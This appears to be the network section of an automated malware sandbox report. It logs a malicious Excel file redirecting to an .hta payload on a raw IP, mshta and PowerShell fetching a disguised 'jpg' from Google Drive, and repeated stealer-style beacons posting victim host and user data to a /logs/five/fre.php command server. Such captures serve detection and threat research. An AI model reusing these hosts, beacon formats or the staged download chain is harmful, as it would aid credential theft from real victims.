                                                                                                  Status: 404 Not Found
                                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                  Data Ascii: File not found.


                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                  73192.168.2.224924694.156.177.22080
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:06:31.255665064 CET244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                  Host: 94.156.177.220
                                                                                                  Accept: */*
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Encoding: binary
                                                                                                  Content-Key: F0B98DE8
                                                                                                  Content-Length: 149
                                                                                                  Connection: close
                                                                                                  Oct 30, 2024 08:06:31.261182070 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                  Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                  Oct 30, 2024 08:06:32.216423035 CET236INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.26.1
                                                                                                  Date: Wed, 30 Oct 2024 07:06:32 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Length: 23
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                  Status: 404 Not Found
                                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                  Data Ascii: File not found.


                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                  74192.168.2.224924794.156.177.22080
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:06:32.729893923 CET244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                  Host: 94.156.177.220
                                                                                                  Accept: */*
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Encoding: binary
                                                                                                  Content-Key: F0B98DE8
                                                                                                  Content-Length: 149
                                                                                                  Connection: close
                                                                                                  Oct 30, 2024 08:06:32.735328913 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                  Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                  Oct 30, 2024 08:06:33.721282005 CET236INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.26.1
                                                                                                  Date: Wed, 30 Oct 2024 07:06:33 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Length: 23
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                  Status: 404 Not Found
                                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                  Data Ascii: File not found.


                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                  75192.168.2.224924894.156.177.22080
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:06:33.861169100 CET244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                  Host: 94.156.177.220
                                                                                                  Accept: */*
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Encoding: binary
                                                                                                  Content-Key: F0B98DE8
                                                                                                  Content-Length: 149
                                                                                                  Connection: close
                                                                                                  Oct 30, 2024 08:06:33.866596937 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                  Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                  Oct 30, 2024 08:06:34.820945024 CET236INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.26.1
                                                                                                  Date: Wed, 30 Oct 2024 07:06:34 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Length: 23
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                  Status: 404 Not Found
                                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                  Data Ascii: File not found.


                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                  76192.168.2.224924994.156.177.22080
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:06:34.976182938 CET244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                  Host: 94.156.177.220
                                                                                                  Accept: */*
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Encoding: binary
                                                                                                  Content-Key: F0B98DE8
                                                                                                  Content-Length: 149
                                                                                                  Connection: close
                                                                                                  Oct 30, 2024 08:06:34.981550932 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                  Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                  Oct 30, 2024 08:06:35.931848049 CET236INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.26.1
                                                                                                  Date: Wed, 30 Oct 2024 07:06:35 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Length: 23
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                  Status: 404 Not Found
                                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                  Data Ascii: File not found.


                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                  77192.168.2.224925094.156.177.22080
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:06:36.086409092 CET244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                  Host: 94.156.177.220
                                                                                                  Accept: */*
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Encoding: binary
                                                                                                  Content-Key: F0B98DE8
                                                                                                  Content-Length: 149
                                                                                                  Connection: close
                                                                                                  Oct 30, 2024 08:06:36.091784000 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                  Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                  Oct 30, 2024 08:06:37.063143015 CET236INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.26.1
                                                                                                  Date: Wed, 30 Oct 2024 07:06:36 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Length: 23
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                  Status: 404 Not Found
                                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                  Data Ascii: File not found.


                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                  78192.168.2.224925194.156.177.22080
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:06:37.224311113 CET244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                  Host: 94.156.177.220
                                                                                                  Accept: */*
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Encoding: binary
                                                                                                  Content-Key: F0B98DE8
                                                                                                  Content-Length: 149
                                                                                                  Connection: close
                                                                                                  Oct 30, 2024 08:06:37.229831934 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                  Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                  Oct 30, 2024 08:06:38.207922935 CET236INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.26.1
                                                                                                  Date: Wed, 30 Oct 2024 07:06:38 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Length: 23
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                  Status: 404 Not Found
                                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                  Data Ascii: File not found.


                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                  79192.168.2.224925294.156.177.22080
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:06:38.513134956 CET244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                  Host: 94.156.177.220
                                                                                                  Accept: */*
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Encoding: binary
                                                                                                  Content-Key: F0B98DE8
                                                                                                  Content-Length: 149
                                                                                                  Connection: close
                                                                                                  Oct 30, 2024 08:06:38.518588066 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                  Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                  Oct 30, 2024 08:06:39.475611925 CET236INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.26.1
                                                                                                  Date: Wed, 30 Oct 2024 07:06:39 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Length: 23
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                  Status: 404 Not Found
                                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                  Data Ascii: File not found.


                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                  80192.168.2.224925394.156.177.22080
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:06:39.627970934 CET244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                  Host: 94.156.177.220
                                                                                                  Accept: */*
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Encoding: binary
                                                                                                  Content-Key: F0B98DE8
                                                                                                  Content-Length: 149
                                                                                                  Connection: close
                                                                                                  Oct 30, 2024 08:06:39.633526087 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                  Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                  Oct 30, 2024 08:06:40.593161106 CET236INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.26.1
                                                                                                  Date: Wed, 30 Oct 2024 07:06:40 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Length: 23
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                  Status: 404 Not Found
                                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                  Data Ascii: File not found.


                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                  81192.168.2.224925494.156.177.22080
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:06:40.746033907 CET244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                  Host: 94.156.177.220
                                                                                                  Accept: */*
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Encoding: binary
                                                                                                  Content-Key: F0B98DE8
                                                                                                  Content-Length: 149
                                                                                                  Connection: close
                                                                                                  Oct 30, 2024 08:06:40.751575947 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                  Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                  Oct 30, 2024 08:06:41.725337029 CET236INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.26.1
                                                                                                  Date: Wed, 30 Oct 2024 07:06:41 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Length: 23
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                  Status: 404 Not Found
                                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                  Data Ascii: File not found.


                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                  82192.168.2.224925594.156.177.22080
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:06:41.866807938 CET244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                  Host: 94.156.177.220
                                                                                                  Accept: */*
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Encoding: binary
                                                                                                  Content-Key: F0B98DE8
                                                                                                  Content-Length: 149
                                                                                                  Connection: close
                                                                                                  Oct 30, 2024 08:06:41.872359991 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                  Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                  Oct 30, 2024 08:06:43.076879025 CET236INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.26.1
                                                                                                  Date: Wed, 30 Oct 2024 07:06:42 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Length: 23
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                  Status: 404 Not Found
                                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                  Data Ascii: File not found.


                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                  83192.168.2.224925694.156.177.22080
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Oct 30, 2024 08:06:43.225351095 CET244OUTPOST /logs/five/fre.php HTTP/1.0
                                                                                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                  Host: 94.156.177.220
                                                                                                  Accept: */*
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Encoding: binary
                                                                                                  Content-Key: F0B98DE8
                                                                                                  Content-Length: 149
                                                                                                  Connection: close
                                                                                                  Oct 30, 2024 08:06:43.230803013 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 33 00 36 00 37 00 37 00 30 00 36 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                                  Data Ascii: (ckav.ruAlbus367706ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                                  Oct 30, 2024 08:06:44.213402033 CET236INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.26.1
                                                                                                  Date: Wed, 30 Oct 2024 07:06:44 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Length: 23
                                                                                                  Connection: close
                                                                                                  X-Powered-By: PHP/5.4.16
                                                                                                  Status: 404 Not Found
                                                                                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                  Data Ascii: File not found.


                                                                                                  HTTPS Proxied Packets

                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  0192.168.2.2249163172.67.162.954433268C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-10-30 07:04:21 UTC365OUTGET /ll2rdE?&moustache=historical&spade=lonely&father HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  UA-CPU: AMD64
                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                  Host: acesso.run
                                                                                                  Connection: Keep-Alive
                                                                                                  2024-10-30 07:04:22 UTC1033INHTTP/1.1 302 Found
                                                                                                  Date: Wed, 30 Oct 2024 07:04:22 GMT
                                                                                                  Content-Type: text/plain; charset=utf-8
                                                                                                  Content-Length: 75
                                                                                                  Connection: close
                                                                                                  X-DNS-Prefetch-Control: off
                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                  Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                                  X-Download-Options: noopen
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  X-XSS-Protection: 0
                                                                                                  Location: http://198.46.178.151/66/gb/greatthingswithmegood.hta
                                                                                                  Vary: Accept
                                                                                                  cf-cache-status: DYNAMIC
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=peqqL0BelLct%2FoiCky0wsL8jRwdaBJdhqmc4BA6T6GVeZqPVrqIQ%2F1QM5TBDPMWMMEo1SAVkJIoR6F1dFuMy%2B4gCBmgtoChGcyw9XtmBlNxl6csnpinN%2BFl31CDN"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8da98d00ac8c2ca8-DFW
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1509&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2822&recv_bytes=947&delivery_rate=1884189&cwnd=251&unsent_bytes=0&cid=3cf61749361419f2&ts=511&x=0"
                                                                                                  2024-10-30 07:04:22 UTC75INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 38 2e 34 36 2e 31 37 38 2e 31 35 31 2f 36 36 2f 67 62 2f 67 72 65 61 74 74 68 69 6e 67 73 77 69 74 68 6d 65 67 6f 6f 64 2e 68 74 61
                                                                                                  Data Ascii: Found. Redirecting to http://198.46.178.151/66/gb/greatthingswithmegood.hta


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  1192.168.2.2249165104.21.74.1914433572C:\Windows\System32\mshta.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-10-30 07:04:24 UTC389OUTGET /ll2rdE?&moustache=historical&spade=lonely&father HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Language: en-US
                                                                                                  UA-CPU: AMD64
                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                  Host: acesso.run
                                                                                                  Connection: Keep-Alive
                                                                                                  2024-10-30 07:04:24 UTC1033INHTTP/1.1 302 Found
                                                                                                  Date: Wed, 30 Oct 2024 07:04:24 GMT
                                                                                                  Content-Type: text/plain; charset=utf-8
                                                                                                  Content-Length: 75
                                                                                                  Connection: close
                                                                                                  X-DNS-Prefetch-Control: off
                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                  Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                                                  X-Download-Options: noopen
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  X-XSS-Protection: 0
                                                                                                  Location: http://198.46.178.151/66/gb/greatthingswithmegood.hta
                                                                                                  Vary: Accept
                                                                                                  cf-cache-status: DYNAMIC
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Nh%2FRLbBlLUOZg2WYQeVGY6qXUMDoIHjC26Iwec5gkMI7kl3aPMmYV9VMdPoPO%2FGZh8fdJF2Vx%2FmcJ5tFLFFoPZNQafUgQYKmY9eve7HUIqAXfgf9Cr4IgcsIuX%2F1"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8da98d0fdac52c99-DFW
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1590&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2823&recv_bytes=971&delivery_rate=1774509&cwnd=251&unsent_bytes=0&cid=22144789272bd494&ts=347&x=0"
                                                                                                  2024-10-30 07:04:24 UTC75INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 39 38 2e 34 36 2e 31 37 38 2e 31 35 31 2f 36 36 2f 67 62 2f 67 72 65 61 74 74 68 69 6e 67 73 77 69 74 68 6d 65 67 6f 6f 64 2e 68 74 61
                                                                                                  Data Ascii: Found. Redirecting to http://198.46.178.151/66/gb/greatthingswithmegood.hta


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  2192.168.2.2249168142.250.186.464434092C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-10-30 07:04:39 UTC121OUTGET /uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur HTTP/1.1
                                                                                                  Host: drive.google.com
                                                                                                  Connection: Keep-Alive
                                                                                                  2024-10-30 07:04:40 UTC1319INHTTP/1.1 303 See Other
                                                                                                  Content-Type: application/binary
                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                  Pragma: no-cache
                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                  Date: Wed, 30 Oct 2024 07:04:40 GMT
                                                                                                  Location: https://drive.usercontent.google.com/download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download
                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                  Content-Security-Policy: script-src 'report-sample' 'nonce-5PIsTHLxlIVMZ1BgnjZoEQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                  Server: ESF
                                                                                                  Content-Length: 0
                                                                                                  X-XSS-Protection: 0
                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                  Connection: close


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  3192.168.2.2249169172.217.16.1934434092C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2024-10-30 07:04:41 UTC139OUTGET /download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download HTTP/1.1
                                                                                                  Host: drive.usercontent.google.com
                                                                                                  Connection: Keep-Alive
                                                                                                  2024-10-30 07:04:43 UTC4906INHTTP/1.1 200 OK
                                                                                                  Content-Type: image/jpeg
                                                                                                  Content-Security-Policy: sandbox
                                                                                                  Content-Security-Policy: default-src 'none'
                                                                                                  Content-Security-Policy: frame-ancestors 'none'
                                                                                                  X-Content-Security-Policy: sandbox
                                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                                  Cross-Origin-Embedder-Policy: require-corp
                                                                                                  Cross-Origin-Resource-Policy: same-site
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  Content-Disposition: attachment; filename="new_image-new.jpg"
                                                                                                  Access-Control-Allow-Origin: *
                                                                                                  Access-Control-Allow-Credentials: false
                                                                                                  Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                  Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                  Accept-Ranges: bytes
                                                                                                  Content-Length: 2239109
                                                                                                  Last-Modified: Mon, 21 Oct 2024 13:42:20 GMT
                                                                                                  X-GUploader-UploadID: AHmUCY1J5RtMMOSyK9cw3Tsst1DD69iuf00aJQsXr0F9QAplZ8b4OjKgMSTgSnOwf-KYJD54qLtWQvnY1g
                                                                                                  Date: Wed, 30 Oct 2024 07:04:43 GMT
                                                                                                  Expires: Wed, 30 Oct 2024 07:04:43 GMT
                                                                                                  Cache-Control: private, max-age=0
                                                                                                  X-Goog-Hash: crc32c=WqxmdA==
                                                                                                  Server: UploadServer
                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                  Connection: close
